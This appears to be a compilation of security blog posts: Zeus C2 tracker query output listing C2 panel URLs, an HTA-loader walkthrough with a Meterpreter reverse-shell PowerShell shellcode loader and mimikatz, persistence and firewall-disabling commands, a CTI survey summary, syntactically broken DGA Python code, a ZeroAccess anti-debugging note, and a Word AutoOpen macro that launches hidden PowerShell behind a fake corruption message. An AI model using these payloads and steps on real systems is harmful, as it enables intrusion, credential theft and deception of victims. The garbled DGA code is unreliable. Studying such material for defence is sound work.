1087                          1  
1088                          1  
1089                          1  
1090                          1  
1091                          1  

[1092 rows x 2 columns]
In [40]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_Zeus_ZeusC2_domains' FROM ZeusC2Tracker WHERE url LIKE '%zeus%' GROUP BY url ORDER BY 'num_of_Zeus_ZeusC2_domains'", conn)
print df
                                                  url  \
0                  0x.x.gg/zeus/adm/index.php?m=login   
1         23.252.120.143/~zeus/30/cp.php?letter=login   
2                 357.toh.info/zeus/admin.php?m=login   
3                   amk.dynvpn.de/zeus/cp.php?m=login   
4                 blackhill.pp.ua/zeus/cp.php?m=login   
5         celenit-idiomas.com.br/zeus7/cp.php?m=login   
6   circleread-view.com.mocha2003.mochahost.com/Ze...   
7         crudeoil.company/zeus/server/cp.php?m=login   
8            darkzeusbtnet.netsons.org/pony/admin.php   
9                                   epsyium.com/zeus/   
10              face2face-nig.biz/zeus/cp.php?m=login   
11  frugaliasdelivery.com/coco/zeus/cp.php?letter=...   
12  perupublica.com/service/mmbb-zeus/adminpanel/a...   
13  quattromexico.com/db121/zeus%202.1.0.1/server%...   
14                     rams3s.org/zeus/cp.php?m=login   
15   rbsfinancials.com/Zeus/server_php/cp.php?m=login   
16    www.crudeoil.company/zeus/server/cp.php?m=login   
17                 zdemo.mooo.com/zeus/cp.php?m=login   
18                          zeus.guvencelikimalat.com   
19  zeusbotnet.net.onebigfishgreenevents.com/cody/...   

    num_of_Zeus_ZeusC2_domains  
0                            1  
1                            1  
2                            1  
3                            1  
4                            1  
5                            1  
6                            1  
7                            1  
8                            1  
9                            1  
10                           1  
11                           1  
12                           1  
13                           1  
14                           1  
15                           1  
16                           1  
17                           1  
18                           1  
19                           1
In [41]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_UAZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.ua%' GROUP BY url ORDER BY 'num_of_UAZeusC2'", conn)
print df
                                                  url  num_of_UAZeusC2
0           247.kiev.ua/love/ssss/ssss/cp.php?m=login                1
1                   avita.lviv.ua/.tmp/cp.php?m=login                1
2                   barfly.com.ua/tito/cp.php?m=login                1
3   berizka.gorodok.km.ua/core/auth/image/cp.php?m...                1
4   berizka.gorodok.km.ua/core/splash/admin/cp.php...                1
5                                      bestdove.in.ua                1
6              bestdove.in.ua/first/admin.php?m=login                1
7                                     blackhill.pp.ua                1
8                 blackhill.pp.ua/zeus/cp.php?m=login                1
9                         counter-1.adscounter.com.ua                1
10    ecoed.com.ua/.smart/Plugins/cp.php?letter=login                1
11             excel.com.ua/image/cp.php?letter=login                1
12  fortuna-group.com.ua/wp-comment/admin.php?m=login                1
13              hallabu.in.ua/index/admin.php?m=login                1
14                                       henex.net.ua                1
15                                 ice.andromed.in.ua                1
16                                         jomo.in.ua                1
17               loxomi.in.ua/index/admin.php?m=login                1
18                                       molowo.in.ua                1
19                                   mygoodness.in.ua                1
20               numogi.in.ua/index/admin.php?m=login                1
21  rest-mlyn.com.ua/includes/db/server/cp.php?m=l...                1
22                    sauti.com.ua/var/cp.php?m=login                1
23                             sdhfjksdhfjksdh.biz.ua                1
24                                    sdspropro.co.ua                1
25  smarthous.com.ua/wp-includes/components/plugin...                1
26                                  vashadvokat.in.ua                1
27              vip-interior.com.ua/e7/cp.php?m=login                1
28                                    visit2013.in.ua                1
29                 vlad-poltava.1gb.ua/cp.php?m=login                1
30  www.coolfox.pp.ua/adminpanel/facts/cp.php?m=login                1
31                   www.fvs.com.ua/tw/cp.php?m=login                1
32      www.pneumatica.com.ua/tmp/.tmp/cp.php?m=login                1
33  www.renomed.org.ua/components/shby/cp.php?m=login                1
34                                www.sdspropro.co.ua                1
35  www.windelectric.ua/images/gh/cp.php?letter=login                1
In [42]:
df = pd.read_sql_query("SELECT url, COUNT(*)  FROM ZeusC2Tracker WHERE url LIKE '%.us%' GROUP BY url ORDER BY 'num_of_US_ZeusC2'", conn)
print df
                                                  url  num_of_US_ZeusC2
0        blueinteractive.us/wp-comment/cp.php?m=login                 1
1             freecashmachine.us/monib/cp.php?m=login                 1
2          jerryguy.usa.cc/css/panel.php?letter=login                 1
3                            joejdbjrmrkklfnmf.usr.me                 1
4                jpardon.usa.cc/xxc/admin.php?m=login                 1
5   landsolutions.us/morganbreaux.com/temp/nepal/c...                 1
6                         ngtools.us/s/cp.php?m=login                 1
7                nyprince.us/gift/item/cp.php?m=login                 1
8                    shieldled.us/ak47/cp.php?m=login                 1
9                   shieldled.us/akguy/cp.php?m=login                 1
10                    shieldled.us/ste/cp.php?m=login                 1
11                     w1sdom.us/13377/cp.php?m=login                 1
12               westiniedsho.us/eme01/cp.php?m=login                 1
13                     wizboi.us/eme01/cp.php?m=login                 1
14  www.global-production.us/longman/edition/cp.ph...                 1
15          www.marshall.usa.cc/war/panel.php?m=login                 1
In [43]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_CC_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.cc%' GROUP BY url ORDER BY 'num_of_CC_ZeusC2'", conn)
print df
                                                 url  num_of_CC_ZeusC2
0  astairepartners.cu.cc/pelumi/server/cp.php?m=l...                 1
1                           g0dday.cc/cp.php?m=login                 1
2         jerryguy.usa.cc/css/panel.php?letter=login                 1
3               jpardon.usa.cc/xxc/admin.php?m=login                 1
4          www.marshall.usa.cc/war/panel.php?m=login                 1
5           www.wideawake.cc/zak/cp.php?letter=login                 1
In [44]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_SU_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.su%' GROUP BY url ORDER BY 'num_of_SU_ZeusC2'", conn)
print df
                                                  url  num_of_SU_ZeusC2
0                              76tguy6hh6tgftrt7tg.su                 1
1                               angryshippflyforok.su                 1
2                                  axpoium.echange.su                 1
3                               beatyhousesupporte.su                 1
4             beautyinthesands.su/lisa/cp.php?m=login                 1
5   bentleyoil.su/lamborghini/roseroll/cp.php?m=login                 1
6   bentleyoil.su/rangeroversport/prosperity/cp.ph...                 1
7                                          bitters.su                 1
8                                           bright.su                 1
9          chemosales.bzs.su/site/root/cp.php?m=login                 1
10                             chezhiyasweheropasl.su                 1
11                                      cosmosdady.su                 1
12             despww.su/3836bkuta3/index.php?m=login                 1
13                                          f8b2b9.su                 1
14  getego.suroot.com/~focused/wp-content/themes/t...                 1
15              liberstotusedis.su/het/cp.php?m=login                 1
16                                   livinglounges.su                 1
17              meziamussucemaqueue.su/ihavethepower/                 1
18                               nonstopeddanceraz.su                 1
19                              pedropedreiromoxik.su                 1
20                                          regame.su                 1
21                                      rsslessons.su                 1
22                                   slot.sub-zero.it                 1
23                             turkeyhotelnoslafas.su                 1
24                                         uptight.su                 1
25                                            wvin.su                 1
26                        zukkoshop.su/cp.php?m=login                 1
In [45]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_Gov_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.gov%' GROUP BY url ORDER BY 'num_of_Gov_ZeusC2'", conn)
print df
                                                 url  num_of_Gov_ZeusC2
0       ayancikmuftulugu.gov.tr/admin/cp.php?m=login                  1
1  teatromunicipal.gov.co/images/indexx.php?lette...                  1
In [20]:
df = pd.read_sql_query("SELECT mdate, ip, url, COUNT (*) FROM ZeusC2Tracker GROUP by ip HAVING COUNT(*) > 1 ORDER by COUNT(*) DESC", conn)
print df
          mdate               ip  \
0    2013-05-22                    
1    15-05-2013  199.192.231.250   
2    15-06-2015     198.1.80.203   
3    21-11-2014  162.144.127.104   
4    25-09-2013     64.32.14.163   
5    22-04-2014     64.32.20.103   
6    14-07-2015   198.57.188.172   
7    28-08-2014    46.149.111.10   
8    2015-12-10    198.105.221.5   
9    31-10-2014  162.144.120.105   
10   23-07-2014   162.144.94.245   
11   29-06-2015    176.119.28.73   
12   2015-09-13    122.155.3.150   
13   04-10-2014    194.201.253.5   
14   23-03-2014  204.188.238.141   
15   04-05-2013  205.251.133.130   
16   21-05-2014     64.31.43.138   
17   11-05-2014   186.202.127.48   
18   19-10-2014    194.201.253.2   
19   2015-02-01   195.16.127.102   
20   19-11-2013    198.176.28.49   
21   27-10-2013  205.251.135.234   
22   2015-10-22   209.200.232.14   
23   09-06-2014    95.173.183.91   
24   01-08-2014   141.105.68.108   
25   12-11-2014     167.160.46.7   
26   11-07-2013  207.210.103.242   
27   04-10-2014    91.236.74.162   
28   27-09-2014   94.242.205.226   
29   01-06-2014    103.28.15.136   
..          ...              ...   
261  18-09-2013    67.205.74.119   
262  30-11-2014    67.228.98.175   
263  19-05-2014    69.167.162.69   
264  2014-06-28   69.194.235.103   
265  27-04-2014     69.27.107.94   
266  17-08-2012    69.28.199.110   
267  02-11-2015     69.28.199.60   
268  2015-12-12      69.4.233.96   
269  28-11-2014     69.64.61.199   
270  26-12-2013     72.9.108.202   
271  04-11-2012     74.81.82.234   
272  2014-07-17    77.55.125.205   
273  19-09-2014   81.196.156.218   
274  13-05-2014      81.88.48.95   
275  2015-12-12      83.98.177.7   
276  15-05-2014    85.95.238.136   
277  04-07-2014   87.247.179.190   
278  2015-08-10     87.98.146.77   
279  24-09-2015   89.233.106.130   
280  11-03-2014   89.248.161.233   
281  20-08-2014   91.197.129.190   
282  14-07-2014    91.223.82.107   
283  30-05-2014    91.223.82.188   
284  27-10-2014     91.223.82.85   
285  25-09-2014    91.236.74.183   
286  08-07-2014     92.240.69.54   
287  29-07-2014      93.190.95.7   
288  14-03-2014     94.102.48.94   
289  01-08-2014   95.173.183.232   
290  12-09-2013      98.130.96.2   

                                                   url  COUNT (*)  
0                                        199.7.234.100        509  
1     os.qintec.sk/images/stories/rolex/cp.php?m=login         26  
2                       kendra.fr/panel/cp.php?m=login         21  
3      ganhedwakar.tk/giveittome/getoff/cp.php?m=login         16  
4                 kingroygold.in/server/cp.php?m=login         15  
5                            sp4m.ru/11/cp.php?m=login         15  
6                      festusca.in/maha/cp.php?m=login         14  
7    zxjfcvfvhqfqsrpz.onion/~lemore/log-needed-asap...         14  
8                                       phoenixtsi.com         13  
9                  muazymaur.tk/maurice/cp.php?m=login         12  
10   obinnaeku.biz/wordpress/wp-includes/js/crop/ob...         12  
11                  emailsclient.com/am/cp.php?m=login         11  
12                                     techjoe.cricket         10  
13   www.nacosti.go.ke/components/com_users/hhghg/c...          9  
14               nitenokliert.co.uk/sat/cp.php?m=login          9  
15   208.98.18.41/zoey/index/kop/uyi/rob/cp.php?m=l...          9  
16   kioskcantinhodaroca.com.br/wp-content/uploads/...          9  
17   herminiametzler.com.br/wp-content/themes/twent...          8  
18                  oakparkltd.com/user/cp.php?m=login          8  
19                              islenpiding.hotmail.ru          8  
20           r-sbonline.biz/images/task/cp.php?m=login          8  
21               urbinarojas.com/update/cp.php?m=login          8  
22                                        molowo.in.ua          8  
23                   buharasifa.com/san/cp.php?m=login          8  
24                   www.iut.sx/webstat/cp.php?m=login          7  
25   55566785677.com/new/test/metro/admin/1/cp.php?...          7  
26                  revrakdesign.ca/zcp/cp.php?m=login          7  
27                        danbeta.ru/g2/cp.php?m=login          7  
28    newbetrrsearve.co.uk/us/serverphp/cp.php?m=login          7  
29             dinamikamandiri.co.id/e7/cp.php?m=login          6  
..                                                 ...        ...  
261      autopartsgene.com/wp-admin/css/cp.php?m=login          2  
262                       malika.nu/css/cp.php?m=login          2  
263  electroingenieria.mx/images/culture/adminpanel...          2  
264                                         58.195.1.4          2  
265           it-support-calgary.ca/999/cp.php?m=login          2  
266                    95.65.107.94/web/cp.php?m=login          2  
267  cheshamfrench.co.uk/digits1/server/cp.php?m=login          2  
268                                       tekchuks.xyz          2  
269       pivetamaqfer.com.br/.htm/cp.php?letter=login          2  
270                      artskit.in/ven/cp.php?m=login          2  
271                   andyrog.net/vices/cp.php?m=login          2  
272                                        joepussy.tk          2  
273                    trans-tech.ro/e7/cp.php?m=login          2  
274                    eyeofgod1.com/Zz/cp.php?m=login          2  
275                                           ijoe.xyz          2  
276  yilinmilletvekili.com/Blast/serverphp/cp.php?m...          2  
277          kasasmock.com/media/system/cp.php?m=login          2  
278                                      eresimgbo.com          2  
279                       eclpi.in/test/cp.php?m=login          2  
280              viaialater.eu/ekpe/school.php?m=login          2  
281        panorama-otel.ru/images/cp.php?letter=login          2  
282            taiyuean.com/logs/1/cp.php?letter=login          2  
283        foxmanwer.pw/new/logo/1/cp.php?letter=login          2  
284          vogel-no0t.com/sage/vip/admin.php?m=login          2  
285             oga-wale.com/robot/cp.php?letter=login          2  
286      erberge-open.com/Media/plugin2/cp.php?m=login          2  
287  panel7h.oxfrontal.com/aa/microupdate/madmin.ph...          2  
288       supleather.biz/admincpanel/admin.php?m=login          2  
289             pinglessmetin2.com/adam/cp.php?m=login          2  
290              www.kueshen.biz/benson/cp.php?m=login          2  

[291 rows x 4 columns]
In [18]:
df = pd.read_sql_query("SELECT mdate, ip, url, COUNT (*) as 'num_of_SameIP_ZeusC2' FROM ZeusC2Tracker GROUP by ip HAVING COUNT(*) > 1 ORDER by 'num_of_SameIP_ZeusC2' DESC", conn)
py.iplot([Bar(x=df.ip, y=df.num_of_SameIP_ZeusC2)], filename='Number of Same IP ZeusC2')
Out[18]:
https://plot.ly/~vkremez/25.embed
In [22]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%199.192.231.250%'", conn)
print df
         mdate               ip  \
0   07-10-2013  199.192.231.250   
1   03-10-2013  199.192.231.250   
2   03-10-2013  199.192.231.250   
3   03-10-2013  199.192.231.250   
4   26-09-2013  199.192.231.250   
5   25-09-2013  199.192.231.250   
6   18-09-2013  199.192.231.250   
7   11-09-2013  199.192.231.250   
8   10-09-2013  199.192.231.250   
9   27-08-2013  199.192.231.250   
10  26-08-2013  199.192.231.250   
11  26-08-2013  199.192.231.250   
12  20-08-2013  199.192.231.250   
13  10-08-2013  199.192.231.250   
14  04-07-2013  199.192.231.250   
15  04-07-2013  199.192.231.250   
16  02-07-2013  199.192.231.250   
17  23-06-2013  199.192.231.250   
18  23-06-2013  199.192.231.250   
19  23-06-2013  199.192.231.250   
20  20-06-2013  199.192.231.250   
21  09-06-2013  199.192.231.250   
22  08-06-2013  199.192.231.250   
23  01-06-2013  199.192.231.250   
24  31-05-2013  199.192.231.250   
25  15-05-2013  199.192.231.250   

                                                  url  
0             newcollins.co.uk/collins/cp.php?m=login  
1       www.imfssd.biz/images/_notes/e/cp.php?m=login  
2           r-sbonlin.co.uk/images/gps/cp.php?m=login  
3           createlognet.co.uk/collins/cp.php?m=login  
4              deborenttt.co.uk/chinko/cp.php?m=login  
5   atlantisexpressdelivery.co.uk/en/g/igw/cp.php?...  
6             calmonstarn.co.uk/roland/cp.php?m=login  
7    chogo16.com/.httaccess/.error_log/cp.php?m=login  
8         fujiconstruction.com.vn/acce/cp.php?m=login  
9   guilde-bleed.fr/images/site/gallery/set/files/...  
10  clasek.de/wp-content/themes/upload/cp.php?m=login  
11                       59.157.4.2/~a/cp.php?m=login  
12             www.mida12.com.br/files/cp.php?m=login  
13                 yamleg.fu8.com/acho/cp.php?m=login  
14                      jhl.com.pe/cuz/cp.php?m=login  
15                 tonytwalib.net/kalu/cp.php?m=login  
16      secmontemilion.com/gJHFTfuyf==/cp.php?m=login  
17  plymouthcoaches.co.uk/libraries/joomla/applica...  
18                  bte-online.org/ron/cp.php?m=login  
19                 bte-online.org/demo/cp.php?m=login  
20                 elenalana.com/tv/js/cp.php?m=login  
21          llgames.com.br/.tmp/server/cp.php?m=login  
22   207.45.176.90/~jhzceecm/myway2013/cp.php?m=login  
23  www.sirimarka.com/wp-content/server/cp.php?m=l...  
24             tr.childrenstorybook.eu/cp.php?m=login  
25   os.qintec.sk/images/stories/rolex/cp.php?m=login
In [23]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%198.1.80.203%'", conn)
print df
         mdate            ip                                               url
0   06-07-2015  198.1.80.203       whiteandomke.in/html/30/cp.php?letter=login
1   06-07-2015  198.1.80.203                     rnedek.at/2010/cp.php?m=login
2   06-07-2015  198.1.80.203                 boyzkwete.in/kwete/cp.php?m=login
3   06-07-2015  198.1.80.203                 bill-bones.com/web/cp.php?m=login
4   06-07-2015  198.1.80.203       bossmoney.xyz/everythingnice/cp.php?m=login
5   06-07-2015  198.1.80.203               vicenttours.com/html/cp.php?m=login
6   06-07-2015  198.1.80.203                andrewjohns.in/html/cp.php?m=login
7   06-07-2015  198.1.80.203                  godassist.in/html/cp.php?m=login
8   06-07-2015  198.1.80.203                asonitsoft.com/html/cp.php?m=login
9   06-07-2015  198.1.80.203             thyssenkrrupp.com/html/cp.php?m=login
10  06-07-2015  198.1.80.203               tetraservcie.in/html/cp.php?m=login
11  06-07-2015  198.1.80.203     www.pimpword.in/june/July/cp.php?letter=login
12  06-07-2015  198.1.80.203                 urchilaa.com/Aryas/cp.php?m=login
13  06-07-2015  198.1.80.203     mytonnymaxltd.net/images/melor/cp.php?m=login
14  06-07-2015  198.1.80.203              kendra.fr/walex/files/cp.php?m=login
15  06-07-2015  198.1.80.203              maxthingo.in/symboss2/cp.php?m=login
16  01-07-2015  198.1.80.203                   boyzkwete.in/car/cp.php?m=login
17  29-06-2015  198.1.80.203  www.philipshotels.in/wordpress/AP/cp.php?m=login
18  29-06-2015  198.1.80.203         www.bigdaddygroup.in/nebro/cp.php?m=login
19  25-06-2015  198.1.80.203              dontknnowbuzz.in/html/cp.php?m=login
20  15-06-2015  198.1.80.203                    kendra.fr/panel/cp.php?m=login

In [24]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%162.144.127.104%'", conn)
print df
         mdate               ip  \
0   03-01-2015  162.144.127.104   
1   03-01-2015  162.144.127.104   
2   22-12-2014  162.144.127.104   
3   19-12-2014  162.144.127.104   
4   19-12-2014  162.144.127.104   
5   19-12-2014  162.144.127.104   
6   19-12-2014  162.144.127.104   
7   19-12-2014  162.144.127.104   
8   19-12-2014  162.144.127.104   
9   12-12-2014  162.144.127.104   
10  09-12-2014  162.144.127.104   
11  03-12-2014  162.144.127.104   
12  01-12-2014  162.144.127.104   
13  01-12-2014  162.144.127.104   
14  21-11-2014  162.144.127.104   
15  21-11-2014  162.144.127.104   

                                                  url  
0         goodwellbeard.in/images/boy2/cp.php?m=login  
1   goodluckfromgod.org/goodluck/Severphp/cp.php?l...  
2        mybbtradeshos.in/html/30/cp.php?letter=login  
3                      vioss.in/server/cp.php?m=login  
4        planstrazwes.biz/html/30/cp.php?letter=login  
5             orientexpcs.org/panel/admin.php?m=login  
6             mytoolstrade.biz/30/cp.php?letter=login  
7     masertrades.biz/webindex/30/cp.php?letter=login  
8         cossytrade.biz/index/30/cp.php?letter=login  
9    demlogz2014.co.in/joey/PANEL/cp.php?letter=login  
10          dumplog.biz/font/serverphp/cp.php?m=login  
11  www.10-star-service.tk/funguy/cp.php?letter=login  
12         kfc-online.tk/dondigit/cp.php?letter=login  
13    ikpeego.biz/wp-includes/fonts/kc/cp.php?m=login  
14       eurobikesbmw.tk/adminpanel/admin.php?m=login  
15    ganhedwakar.tk/giveittome/getoff/cp.php?m=login

HTA Loader with Powershell Invocation -> System Compromise via CVE-2014-4113

Goal:

Simulate a sophisticated adversary by leveraging a compromised website hosting a zip archive via iframe with .hta loader with the PowerShell invocation leading to Meterpreter Reverse TCP Shell.

Steps: 

  • python unicorn.py windows/meterpreter/reverse_tcp hta (credits go to Dave Kennedy)
  • Serve the .hta loader as zipped “payment_invoice” with the encoded PowerShell at /var/www/html
Additional Metasploit Commands:
  • msfconsole – r unicorn.rb
  • meterpreter shell
  • getsid
  • getuid
  • migrate
  • getsystem
  • run killav
  • run checkvm
  • exploit Windows7 Service Pack 1 msp
  • use incognito
  • run countermeasure
  • run countermeasure –d –k
  • shell
    • netsh firewall set opmode disable //disable firewall
  • run vnc
  • load mimikatz
  • ls
  • upload /home/user/mimikatz.exe C:\\
  • timestop mimikatz.exe -f “C:\\Windows\System32\\cmd.exe”
  • shell
    • mimikatz.exe
    • privilege::debug
    • inject::process lsass.exe sekurlsa.dll
    • getLogonPasswords
    • sekurlsa::logonPasswords full
  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
  • attrib +h c:\autoexec.bat //make it hidden
  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)

iframe Source code: 
 
<iframe id="frame" src="payment_invoice950123.zip” application=”yes” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no>>
 
Victim View
PowerShell Script:
 
$mcBY = ‘$kI9 = ”[DllImport(“kernel32.dll”)]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(“kernel32.dll”)]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(“msvcrt.dll”)]public static extern IntPtr memset(IntPtr dest, uint src, uint count);”;$w = Add-Type -memberDefinition $kI9 -Name “Win32” -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xda,0xc7,0xbe,0x87,0xd1,0x3a,0x4f,0xd9,0x74,0x24,0xf4,0x5f,0x33,0xc9,0xb1,0x47,0x31,0x77,0x18,0x83,0xc7,0x04,0x03,0x77,0x93,0x33,0xcf,0xb3,0x73,0x31,0x30,0x4c,0x83,0x56,0xb8,0xa9,0xb2,0x56,0xde,0xba,0xe4,0x66,0x94,0xef,0x08,0x0c,0xf8,0x1b,0x9b,0x60,0xd5,0x2c,0x2c,0xce,0x03,0x02,0xad,0x63,0x77,0x05,0x2d,0x7e,0xa4,0xe5,0x0c,0xb1,0xb9,0xe4,0x49,0xac,0x30,0xb4,0x02,0xba,0xe7,0x29,0x27,0xf6,0x3b,0xc1,0x7b,0x16,0x3c,0x36,0xcb,0x19,0x6d,0xe9,0x40,0x40,0xad,0x0b,0x85,0xf8,0xe4,0x13,0xca,0xc5,0xbf,0xa8,0x38,0xb1,0x41,0x79,0x71,0x3a,0xed,0x44,0xbe,0xc9,0xef,0x81,0x78,0x32,0x9a,0xfb,0x7b,0xcf,0x9d,0x3f,0x06,0x0b,0x2b,0xa4,0xa0,0xd8,0x8b,0x00,0x51,0x0c,0x4d,0xc2,0x5d,0xf9,0x19,0x8c,0x41,0xfc,0xce,0xa6,0x7d,0x75,0xf1,0x68,0xf4,0xcd,0xd6,0xac,0x5d,0x95,0x77,0xf4,0x3b,0x78,0x87,0xe6,0xe4,0x25,0x2d,0x6c,0x08,0x31,0x5c,0x2f,0x44,0xf6,0x6d,0xd0,0x94,0x90,0xe6,0xa3,0xa6,0x3f,0x5d,0x2c,0x8a,0xc8,0x7b,0xab,0xed,0xe2,0x3c,0x23,0x10,0x0d,0x3d,0x6d,0xd6,0x59,0x6d,0x05,0xff,0xe1,0xe6,0xd5,0x00,0x34,0x92,0xd0,0x96,0x77,0xcb,0xdb,0xa2,0x10,0x0e,0xdc,0x2b,0x5a,0x87,0x3a,0x7b,0xcc,0xc8,0x92,0x3b,0xbc,0xa8,0x42,0xd3,0xd6,0x26,0xbc,0xc3,0xd8,0xec,0xd5,0x69,0x37,0x59,0x8d,0x05,0xae,0xc0,0x45,0xb4,0x2f,0xdf,0x23,0xf6,0xa4,0xec,0xd4,0xb8,0x4c,0x98,0xc6,0x2c,0xbd,0xd7,0xb5,0xfa,0xc2,0xcd,0xd0,0x02,0x57,0xea,0x72,0x55,0xcf,0xf0,0xa3,0x91,0x50,0x0a,0x86,0xaa,0x59,0x9e,0x69,0xc4,0xa5,0x4e,0x6a,0x14,0xf0,0x04,0x6a,0x7c,0xa4,0x7c,0x39,0x99,0xab,0xa8,0x2d,0x32,0x3e,0x53,0x04,0xe7,0xe9,0x3b,0xaa,0xde,0xde,0xe3,0x55,0x35,0xdf,0xd8,0x83,0x73,0x95,0x30,0x10;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$NNL=$w::VirtualAlloc(0,0×1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($NNL.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$NNL,0,0,0);for (;;){Start-sleep 60};’;$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($mcBY));$03F = “-EncodedCommand “;if([IntPtr]::Size -eq 8){$914J = $env:SystemRoot + “\syswow64\WindowsPowerShell\v1.0\powershell”;iex “& $914J $03F $e”}else{;iex “& powershell $03F $e”;}

III. Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu):

SANS: Who’s Using Cyberthreat Intelligence and How?

“Who’s Using Cyberthreat Intelligence and How?” By Dave Shackleford 


[Source: http://www.sans.org/reading-room/whitepapers/analyst/cyberthreat-intelligence-how-35767]


Outline:
Threat Intelligence – the set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators

Purpose of CTI:
• Ability to see attacks in context
• Accuracy of detection and response
• Faster detection and response 

Data Collection Points:
“In addition to the 59% stating they are gathering intelligence from their internal systems, 76% of respondents say their organizations are gathering intelligence from the security community at large.

The external sources they are gathering information from include: • 56% gather intelligence from their vendor product’s CTI feeds • 54% gather intelligence from their public CTI feeds • 53% gather intelligence from open source feeds

A small number of answers in the “Other” category included private feeds for government agencies and law enforcement, as well as social media and sites such as the SANS Internet Storm Center (ISC). “

Intelligence Feeds
“We asked those who selected “vendor-driven CTI feeds” what types of vendors were providing these. The range of responses was very broad, and many teams are obviously using CTI data from a number of different types of vendors. Endpoint security vendors led with 51%, but 43% of respondents are also getting CTI information from unified threat management (UTM)/firewall/IDS vendors and 40% from CTI platform vendors, vulnerability management providers and SIEM vendors. “

Planning for CTI
Organizations planning to invest in CTI feeds, tools and internal capabilities should assess their readiness for using CTI now and in the future.

1. Decide what you intend to do with CTI data and to whom you will assign to CTI planning duties. Most organizations that attempt to implement CTI ad hoc, with no budget, staff, tools or goals, tend to reap minimal rewards.

2. Focus on tools and feeds. Once you’ve decided what you plan to do with CTI (improve detection capabilities, add more granular correlation rules to your SIEM, add host-based forensics indicators, etc.), focus on two areas: What kinds of tools will you use to aggregate and collect CTI data? And will you use commercial feeds, open source and community data, or both? Many SIEM providers are now integrating CTI feeds and information readily. Be sure to look at standard import data formats if you are bringing in feeds.

3. Consider your goals. Once you’ve decided on the basics of what data you want and where it will be aggregated, think about the short- and long-term goals of the program and how you’ll measure progress. 

CTI Standards and Tools
CVE and CVSS
• Open Threat Exchange (OTX)—51%
• Structured Threat Information Expression (STIX)—46%
• Collective Intelligence Framework (CIF)—39%
• Open Indicators of Compromise (OpenIOC) framework—33%
• Trusted Automated eXchange of Indicator Information (TAXII)—33%
• Traffic Light Protocol (TLP)—28%
• Cyber Observable eXpression (CybOX)—26%
• Incident Object Description and Exchange Format (IODEF)—23%
• Vocabulary for Event Recording and Incident Sharing (VERIS)—20%

Domain Generation Algorithm (DGA): Ways to Communicate

# Domain Generation Algorithm (DGA): Python Implementation 

Ways to disseminate the DGA seed:
(1) Spread inside the bot config (easy but insecure);
(2) Generate based on the GetSystemInfo & GetCurrentUser etc. (local environment) (more secure)
(3) Pull additional websites based off the seed websites’ HTML source code . Example,

ROEbG92ZXJhaW4ueHl6ROE

# ROE is a marker for Base64-encoded loverain.xyz

1.
# -*- coding: utf-8 -*- 
import hashlib
def md5_dga(seed)
 var hashlib.md5() # hash the seed using the entry algorithm 
 var.update(seedname 
 var.hexdigest() # cut all the strings after the 10th one 
 part name[:10
 return “{}.xyz”.format(part

seed “cm9jayduJ3JvbGw=” # ASCII: rock’n’roll 
for in range(12)
 seed md5_dga(seed)
 print seed

2.
# -*- coding: utf-8 -*- 
import hashlib
dga_dictionary = [‘btc’‘love’‘bit’,‘rain’,‘drop’
def dictionary_dga(seed): 
 ln len(dga_dictionary# check the maximum length of the DGA dictionary
 if ln ln <= seed
  return False # choose 2 words 
 first seed ln
 last seed ln # create an address concatenating variable 1 + variable 2 
 addr “{}{}.xyz”.format(dga_dictionary[first],dga_dictionary[last]
 return addr
for in range(20)
 print dictionary_dga(x)


Dissecting ZeroAccess: Int 2d Anti-Debugging Technique

Source: fumalwareanalysis.blogspot.com

Learning Goals:

  • Understand the general interrupt handling mechanism on x86 platform;
  • Understand the byte scission anti-debugging technique; and,
  • Know how to use a binary debugger to patch an executable program

The general anti-debugging techniques are as follows:
(1) to detect the existence of a debugger, and behave differently when a debugger is attached to the current process; and,
(2) to disrupt or crash a debugger.

The instruction we are trying to analyze is the “INT 2D” instruction located at 0x00413BD5 (as shown in Figure 1). By single-stepping the malware, you might notice that the program’s entry point is 0x00413BC8. After the execution of the first 8 instructions, right before the “INT 2D” instruction, the value of EAX is 0x1. This is an important fact you should remember in the later analysis.

Docm Macro Beacon Loader: From Cybercriminal Perspective

Goal:

  • Simulate an advanced adversary using macros with .docm documents and PowerShell to create a beacon-type payload using unicorn.py (thanks to TrustedSec!)
  • It is similar to Locky, Cerber, Carbanak payloads minus PowerShell

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it AutoOpen and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that.

The full macro script is as follows:

Sub AutoOpen()
Dim x
x = "-window hidden -EncodedCommand " "
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
